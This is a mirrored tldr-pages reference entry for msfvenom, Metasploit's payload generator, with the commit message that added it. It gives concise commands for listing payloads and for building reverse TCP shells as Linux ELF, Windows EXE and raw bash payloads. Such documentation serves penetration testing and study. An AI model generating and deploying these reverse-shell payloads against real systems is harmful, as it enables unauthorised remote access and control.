mirror of
https://github.com/tldr-pages/tldr.git
synced 2024-10-06 08:17:58 +03:00
cf7215e832
* Use built in output option in msfvenom * Add msfvenom example to generate bash reverse tcp handler * Add newline to the end of msfvenom file * Update pages/common/msfvenom.md Co-authored-by: Axel Navarro <navarroaxel@gmail.com> Co-authored-by: Axel Navarro <navarroaxel@gmail.com>
780 B
780 B
msfvenom
Manually generate payloads for metasploit. More information: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom.
- List payloads:
msfvenom -l payloads
- List formats:
msfvenom -l formats
- Show payload options:
msfvenom -p {{payload}} --list-options
- Create an ELF binary with a reverse TCP handler:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf -o {{path/to/binary}}
- Create an EXE binary with a reverse TCP handler:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe -o {{path/to/binary.exe}}
- Create a raw bash with a reverse TCP handler:
msfvenom -p cmd/unix/reverse_bash LHOST={{local_ip}} LPORT={{local_port}} -f raw